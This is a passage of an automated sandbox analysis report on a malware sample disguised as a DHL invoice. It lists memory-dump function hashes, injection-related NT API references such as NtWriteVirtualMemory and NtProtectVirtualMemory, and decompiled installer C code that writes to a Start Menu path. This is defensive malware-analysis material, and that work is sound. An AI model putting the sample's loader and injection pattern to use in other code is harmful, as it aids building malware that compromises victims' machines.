Associated: 00000001.00000002.18002166253.0000000074113000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002259835.0000000074115000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74110000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: ErrorLastMemoryProtectVirtual
String ID:
API String ID: 3584383743-0
Opcode ID: 27f96eaa5f9526a4008a24a983fab11d68b792bb45053fc38d76c8a5c8fffb92
Instruction ID: bd3cd660f022020898876d0395ae069781b3391c7c62b6e9542e09683b4f4603
Opcode Fuzzy Hash: 27f96eaa5f9526a4008a24a983fab11d68b792bb45053fc38d76c8a5c8fffb92
Instruction Fuzzy Hash: 5E51B572614246DFE721FF67E9C0BC937B5EB84714F2044BAE409EB601E6389680CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03283B6E Relevance: 1.9, APIs: 1, Instructions: 358nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?), ref: 03283B83

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: a5c948478bdce416946ccd10ab09d4faec1d4cfc5bdaadc0cddf2d4e08dfb22e
Instruction ID: 59b19eeb93f2470cd34b7321fcf2629b518a890531477e82d2ea8c3a28536d75
Opcode Fuzzy Hash: a5c948478bdce416946ccd10ab09d4faec1d4cfc5bdaadc0cddf2d4e08dfb22e
Instruction Fuzzy Hash: 7FA1F07A019249EFCB16DF24DC44EC6BB6AEF12300F1E0459EA54EB991C7375B86CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0327C1FE Relevance: 1.7, Strings: 1, Instructions: 468COMMON

Download Yara Rule

Strings

&Aw|, xrefs: 0327C5A6

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: &Aw|
API String ID: 0-3968342575
Opcode ID: b902aff17403f1251cac566180cac71316746bbcd748393c82694ac04f70ebbf
Instruction ID: 46ba121bc941ad8334b2d23b1d28eef7da5ac04f39ea73e5d6534ed2793292fd
Opcode Fuzzy Hash: b902aff17403f1251cac566180cac71316746bbcd748393c82694ac04f70ebbf
Instruction Fuzzy Hash: 08E1BB7161435ADFDF34CE288C94BCB37AAEF49350F1A402EDC89AB641D73299828B51

Uniqueness

Uniqueness Score: -1.00%

Function 0327D6F5 Relevance: 1.7, Strings: 1, Instructions: 428COMMON

Download Yara Rule

Strings

L x, xrefs: 0327D840

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: L x
API String ID: 0-538039705
Opcode ID: 70cf2c9bc6ae7c89c54e0e2b228155e512f0735455ca5ccde0fe13663a269b6a
Instruction ID: 0fdd63e4df2ffc9bbc75c97ef6340727e809d22cb7ec226131906dae92f04b8c
Opcode Fuzzy Hash: 70cf2c9bc6ae7c89c54e0e2b228155e512f0735455ca5ccde0fe13663a269b6a
Instruction Fuzzy Hash: 4CF1227561438A8FDF34CE29CD987DA77A2FF99320F95812ECC4D8B245D7708A828B51

Uniqueness

Uniqueness Score: -1.00%

Function 03291236 Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

m@, xrefs: 0329140D

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: m@
API String ID: 0-935879454
Opcode ID: 850c56c316d30502354a62f5e4f3a79ac40a6cf89762da03d8a82c7cafec1f73
Instruction ID: 53b06c2d1da056cf83aa84b6790395d43309f1c98afdf82046cc99b4a0a24065
Opcode Fuzzy Hash: 850c56c316d30502354a62f5e4f3a79ac40a6cf89762da03d8a82c7cafec1f73
Instruction Fuzzy Hash: 09C187B1610309CFDF259E35C9A43DB3BA6EF56314FA5816ECC4A9F620D37249828B41

Uniqueness

Uniqueness Score: -1.00%

Function 03295803 Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000001,032961A7,0EB981D2,00000000), ref: 03295978

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 0ab27671dbd6c2c46085877f0c5800e703484d0325fcec1cfb1c54582d16ec31
Instruction ID: deb217258995fe6e6be0a138d6cd6be64d6c0dcb0c56f3ebdaae3c2e844f528b
Opcode Fuzzy Hash: 0ab27671dbd6c2c46085877f0c5800e703484d0325fcec1cfb1c54582d16ec31
Instruction Fuzzy Hash: 5401A231734245CBFF2ACE389AD43D933A6AF87224F34416BC8428F654C37099C98B40

Uniqueness

Uniqueness Score: -1.00%

Function 03294842 Relevance: 1.5, APIs: 1, Instructions: 42nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 03294921

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4e37cc28d405c0e6fefc0ab108a800e6acb55f92c9506792f0304454b4ca194c
Instruction ID: ad5a88f53e55b04dfcd5d7144c88ee572e9185890c919147babb5085b53d9e1e
Opcode Fuzzy Hash: 4e37cc28d405c0e6fefc0ab108a800e6acb55f92c9506792f0304454b4ca194c
Instruction Fuzzy Hash: E301F2B5614359DFEB24DE28DC14BEA77E6AFD4380F05812ADC4AA7344D770A900C700

Uniqueness

Uniqueness Score: -1.00%

Function 0327E0EC Relevance: 1.5, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

ISL, xrefs: 0327E249

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: ISL
API String ID: 0-3135812629
Opcode ID: c2e5c04c7767fcd1db48f7dc64d21cfcaa76bc0a7cc2d2998684fb1d0cd929d8
Instruction ID: f29e1d71e687eca7a2c8e296644942098af905180065ecce4aff63bbfe1c9d48
Opcode Fuzzy Hash: c2e5c04c7767fcd1db48f7dc64d21cfcaa76bc0a7cc2d2998684fb1d0cd929d8
Instruction Fuzzy Hash: D0A17475A04349AFEF24DE29CC957DB73BAFF98750F55802EDC889B204D7709A828B40

Uniqueness

Uniqueness Score: -1.00%

Function 03281CAD Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

sCOt, xrefs: 03281DB3

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: sCOt
API String ID: 0-177931544
Opcode ID: 3b0e9c319f889454e4888f57e8bb1a3d667f9471b290fd20299df57c2a7993d3
Instruction ID: 25681496bf017e6599a410f1ba7516a76ad77b1a82bbde3d2c8328e27fc3e196
Opcode Fuzzy Hash: 3b0e9c319f889454e4888f57e8bb1a3d667f9471b290fd20299df57c2a7993d3
Instruction Fuzzy Hash: 399141B1A10305DFDF30DF28C9A07CA77B6AF69360F59806ACC49AF249D3749982CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0327B4BB Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bafa4db8b2b905f122baf21ea8117095d786444c55a0926f0a63fb02a2cf651
Instruction ID: cad8993f9f8ce337ab7adcc72521a42241270e4517d2288e605c7273e2d9d207
Opcode Fuzzy Hash: 3bafa4db8b2b905f122baf21ea8117095d786444c55a0926f0a63fb02a2cf651
Instruction Fuzzy Hash: 3571DC31018349EFC7088F30D885ADBBBAAFF46310F2A495DE995EF942C3365546CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03290DB4 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 11890ee464cb12473286a5dac8d466f8386bade90519edf2268c31adda262f48
Instruction ID: 6e3a4017bda2a914011dc05c560a091415feb3fdb253d1488170b4bcd8af59f9
Opcode Fuzzy Hash: 11890ee464cb12473286a5dac8d466f8386bade90519edf2268c31adda262f48
Instruction Fuzzy Hash: 379159B8A1435ADFEF34EF298C947DB33A6AF58350F85402BCC899B244D7719D858B42

Uniqueness

Uniqueness Score: -1.00%

Function 03291F89 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b39b2235e2281943601ebf388744db4830a64f74adcf54030dead77c9e7f49
Instruction ID: 465e024de4d3a2396ba153987c92fada92362f1ab60b25f14024e1647cb42466
Opcode Fuzzy Hash: 16b39b2235e2281943601ebf388744db4830a64f74adcf54030dead77c9e7f49
Instruction Fuzzy Hash: 8B4115B5A10358EBEF34DE198D947CB73E6AF98710F55802ADC48AB304D7715D818B81

Uniqueness

Uniqueness Score: -1.00%

Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00403D22(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x4236d0 = _t37;
					if(_t118 == 0x110) {
						 *0x42a208 = _t128;
						 *0x4236e4 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216b0 = _t94;
						E004041FB(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x4291e8);
						 *0x4291cc = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x4236d0 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x42a240;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E00404247(0x40b);
						while(1) {
							_t39 =  *0x4236d0;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x42a244;
							if(_t41 ==  *0x42a244) {
								E0040140B(1);
							}
							__eflags =  *0x4291cc - _t136;
							if( *0x4291cc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x42a244; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E004062A6(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004041FB(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004041FB(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004041FB(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x42a2ac - _t136;
							_v32 = _t51;
							if( *0x42a2ac != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E0040421D(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x4216b0, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x42a2ac - _t136;
							if( *0x42a2ac == _t136) {
								_push( *0x4236e4);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x4216b0);
							}
							E00404230();
							E00406284(0x4236e8, E00403D03());
							E004062A6(0x4236e8, _t128, _t133,  &(0x4236e8[lstrlenW(0x4236e8)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x4236e8); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x4291d8); // executed
									 *0x4226c0 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x42a200,  *_t133 +  *0x4291e0 & 0x0000ffff, _t128,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x4291d8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004041FB(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x4291d8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x4291cc - _t136;
									if( *0x4291cc != _t136) {
										goto L61;
									}
									ShowWindow( *0x4291d8, 8); // executed
									E00404247(0x405);
									goto L58;
								}
								__eflags =  *0x42a2ac - _t136;
								if( *0x42a2ac != _t136) {
									goto L61;
								}
								__eflags =  *0x42a2a0 - _t136;
								if( *0x42a2a0 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x4291d8);
						 *0x42a208 = _t136;
						EndDialog(_t128,  *0x421eb8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x4291d8, 0x40f, 0, 1);
						__eflags =  *0x4291cc;
						return 0 |  *0x4291cc == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x4236c8, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x4236c8,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E00404262(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x4291d8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a2ac - _t136;
										if( *0x42a2ac == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x421eb8 = 1;
											L21:
											_push(0x78);
											L22:
											E004041D4();
											goto L26;
										}
										E0040140B(_t130);
										 *0x421eb8 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x4291d8);
						 *0x4291d8 = _a12;
						L58:
						if( *0x4256e8 == _t136 &&  *0x4291d8 != _t136) {
							ShowWindow(_t128, 0xa); // executed
							 *0x4256e8 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403d2b
0x00403d34
0x00403e75
0x00403e79
0x00403e7d
0x00403e7f
0x00403e84
0x00403e8f
0x00403e9a
0x00403e9f
0x00403ea1
0x00403ea3
0x00403ea6
0x00403eab
0x00403eb9
0x00403ec6
0x00403ecd
0x00403ecd
0x00403ece
0x00403ece
0x00403ed3
0x00403ed9
0x00403ee0
0x00403ee6
0x00403ee8
0x00403f28
0x00403f2d
0x00403f32
0x00403f32
0x00403f37
0x00403f40
0x00403f42
0x00403f47
0x00403f4d
0x00403f51
0x00403f51
0x00403f56
0x00403f5c
0x00000000
0x00000000
0x00403f67
0x00403f6d
0x00000000
0x00000000
0x00403f76
0x00403f7e
0x00403f83
0x00403f86
0x00403f8c
0x00403f91
0x00403f94
0x00403f9a
0x00403f9f
0x00403fa2
0x00403fa8
0x00403fb0
0x00403fb6
0x00403fbc
0x00403fc0
0x00403fc7
0x00403fc7
0x00403fc7
0x00403fd1
0x00403fe3
0x00403fef
0x00403ff4
0x00403ffe
0x00404004
0x00404006
0x0040400b
0x00404008
0x00404008
0x00404008
0x0040401b
0x00404033
0x00404035
0x0040403b
0x00404050
0x0040403d
0x00404046
0x00404048
0x00404048
0x00404056
0x00404067
0x0040407d
0x00404084
0x0040408a
0x0040408e
0x00404093
0x00404095
0x00000000
0x0040409b
0x0040409b
0x0040409d
0x00000000
0x00000000
0x004040a3
0x004040a7
0x004040cc
0x004040d2
0x004040d8
0x004040da
0x00000000
0x00000000
0x00404100
0x00404106
0x00404108
0x0040410d
0x00000000
0x00000000
0x00404113
0x00404116
0x00404119
0x00404130
0x0040413c
0x00404155
0x0040415b
0x0040415f
0x00404164
0x0040416a
0x00000000
0x00000000
0x00404174
0x0040417f
0x00000000
0x0040417f
0x004040a9
0x004040af
0x00000000
0x00000000
0x004040b5
0x004040bb
0x00000000
0x00000000
0x00000000
0x004040c1
0x00404095
0x0040418c
0x00404198
0x0040419f
0x00000000
0x00403eea
0x00403eea
0x00403eed
0x00403f20
0x00403f20
0x00403f22
0x00000000
0x00000000
0x00000000
0x00403f22
0x00403eef
0x00403ef3
0x00403ef8
0x00403efa
0x00000000
0x00000000
0x00403f0a
0x00403f12
0x00000000
0x00403f18
0x00403d46
0x00403d46
0x00403d4a
0x00403d4f
0x00403d5e
0x00403d5e
0x00403d67
0x00403d70
0x00403d7b
0x00403d7b
0x00403d87
0x00403da3
0x00403da6
0x00403db9
0x00403dbf
0x00403e62
0x00000000
0x00403e6b
0x00403dc5
0x00403dd2
0x00403dd4
0x00403dd6
0x00403df5
0x00403df5
0x00403df8
0x00403dfd
0x00403e00
0x00403e10
0x00403e11
0x00403e13
0x00403e49
0x00403e5c
0x00000000
0x00403e5c
0x00403e15
0x00403e1b
0x00403e34
0x00403e39
0x00403e3b
0x00000000
0x00000000
0x00403e3d
0x00403e29
0x00403e29
0x00403e2b
0x00403e2b
0x00000000
0x00403e2b
0x00403e1e
0x00403e23
0x00000000
0x00403e23
0x00403e02
0x00403e08
0x00000000
0x00000000
0x00403e0a
0x00000000
0x00403e0a
0x00403dfa
0x00000000
0x00403dfa
0x00403de0
0x00403de7
0x00403ded
0x00403def
0x00000000
0x00000000
0x00000000
0x00403def
0x00403dab
0x00000000
0x00403d89
0x00403d8f
0x00403d99
0x004041a5
0x004041ab
0x004041b8
0x004041be
0x004041be
0x004041c8
0x00000000
0x004041c8
0x00403d87

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
ShowWindow.USER32(?), ref: 00403D7B
DestroyWindow.USER32 ref: 00403D8F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
GetDlgItem.USER32(?,?), ref: 00403DCC
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
IsWindowEnabled.USER32(00000000), ref: 00403DE7
GetDlgItem.USER32(?,00000001), ref: 00403E95
GetDlgItem.USER32(?,00000002), ref: 00403E9F
SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
GetDlgItem.USER32(?,00000003), ref: 00403FB0
ShowWindow.USER32(00000000,?), ref: 00403FD1
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
EnableWindow.USER32(?,?), ref: 00403FFE
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
EnableMenuItem.USER32(00000000), ref: 0040401B
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
SetWindowTextW.USER32(?,004236E8), ref: 00404084
ShowWindow.USER32(?,0000000A), ref: 004041B8

Strings

6B, xrefs: 00404060

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: 6B
API String ID: 3282139019-4127139157
Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403974 Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403974(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a214;
				_t22 = E0040665E(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x4236e8;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406152(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x4236e8, 0);
					__eflags =  *0x4236e8;
					if(__eflags == 0) {
						E00406152(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x4236e8, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004061CB(L"1033", _t73 & 0x0000ffff);
				}
				E00403C4A(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical";
				 *0x42a2a0 =  *0x42a21c & 0x00000020;
				 *0x42a2bc = 0x10000;
				if(E00405C61(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical") != 0) {
					L16:
					if(E00405C61(_t98, _t86) == 0) {
						E004062A6(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a200, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x4291e8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C4A(_t78, __eflags);
							__eflags =  *0x42a2c0;
							if( *0x42a2c0 != 0) {
								_t33 = E004053BF(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4291cc;
								if( *0x4291cc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x4236c8, 5); // executed
							_t39 = E004065EE("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004065EE("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291a0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291a0);
								 *0x4291c4 = _t87;
								RegisterClassW(0x4291a0);
							}
							_t44 = DialogBoxParamW( *0x42a200,  *0x4291e0 + 0x00000069 & 0x0000ffff, 0, E00403D22, 0); // executed
							E004038C4(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a200;
						 *0x4291a4 = E00401000;
						 *0x4291b0 =  *0x42a200;
						 *0x4291b4 = _t30;
						 *0x4291c4 = 0x40a380;
						if(RegisterClassW(0x4291a0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x4236c8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a200, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281a0;
					E00406152(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281a0, 0);
					_t63 =  *0x4281a0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281a2;
						 *((short*)(E00405B86(0x4281a2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406284(_t86, E00405B59(_t76));
						goto L16;
					} else {
